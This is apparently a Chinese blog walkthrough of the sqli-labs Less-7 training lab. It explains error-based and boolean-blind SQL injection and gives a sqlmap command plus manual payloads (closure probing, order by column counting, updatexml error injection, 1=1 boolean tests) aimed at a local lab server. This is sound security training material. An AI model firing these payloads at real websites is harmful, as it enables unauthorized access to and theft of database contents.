Sqli-labs-Less-7![](https://img-blog.csdnimg.cn/direct/b0bf0601a5b44a7d833d15a2087cf7ba.png)
前言:
SQL注入的三个条件:
①参数可控;(从参数输入就知道参数可控)
②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)
③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)
①参数可控;(从参数输入就知道参数可控)
②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)
③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)
利用 order by 来测列数
测显位:mysql用1,2,3,4
Mysql获取相关数据:
一、数据库版本-看是否认符合information_schema查询-version()
二、数据库用户-看是否符合root型注入攻击-user()
三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os
四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()
sql注入——报错注入(Error-based)
sqlmap 会替换或者添加用于引发特定数据库错误的 SQL 语句到查询参数里面,并通过解析对应的注入结果,判断特定的数据库错误信息是否存在响应的 headers/body 中。这项技术只有在 Web 应用配置开启后端 DBMS 错误信息提醒才有效。
MySQL提供了一个 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。
updatexml(xml_target, xpath_expr, new_val)
xml_target 是要更新的 XML 列或变量。
xpath_expr 是要更新的 XML 节点的路径表达式。
new_val 是要替换节点值的新值。
sql注入——布尔型盲注(Boolean-based blind)
sqlmap 会替换或添加 SQL 语句到 HTTP 请求的查询参数里面,相关的 SQL 语句可能是合法的
SELECT
子查询,也可以是任意用于获取输出数据的 SQL 语句。针对每个注入检测的 HTTP 响应,sqlmap 通过对比原始请求响应的 headers/body,从而逐个字符地推导出注入语句的输出。或者,用户可以预先提供一个字符串或正则表达式,用于对正确页面结果进行匹配。sqlmap 内部实现了二分算法,使得输出中的每一个字符可在最多 7 个 HTTP 请求内被获取。如果请求响应结果不是简单的明文字符集,sqlmap 会采取更大范围的算法来检测输出。
#自动化注入-SQLmap工具注入
SQLmap用户手册:文档介绍 - sqlmap 用户手册
python sqlmap.py -u http://192.168.0.7:802/sqli-labs/Less-7/?id=2 --current-db
爆当前数据库为:security。
成功利用漏洞!!!
#手工注入
1.根据提示id传参/?id=1,显示You are in.... Use outfile......
/?id=0 显示You have an error in your SQL syntax , 说明id=0值不存在即不符合
/?id=1" 显示You are in.... Use outfile...... /?id=1' ?id=1'--+ 显示You have an error in your SQL syntax
说明,闭合中包括单引号' 但不仅限于单引号
... ... 不断测试,
?id=1'))--+ 时显示You are in.... Use outfile......
说明,闭合为 单引号+两个小括号 ')) 闭合
2.尝试order by 爆列数,发现值为3时 显示You are in.... Use outfile......,值为4时 显示 You have an error in your SQL syntax
即列数为3
3.尝试报错注入,?id=1')) and updatexml(1,concat(1,(select user())),1)--+
显示You have an error in your SQL syntax,说明当语句错误时都统一显示这个。
所以报错注入行不通。
4.尝试布尔型注入,?id=1')) and 1=1--+
显示You are in.... Use outfile......,说明布尔型注入可以利用
布尔型注入参考他人文章:【SQL注入-无回显】布尔盲注:原理、函数、利用过程-CSDN博客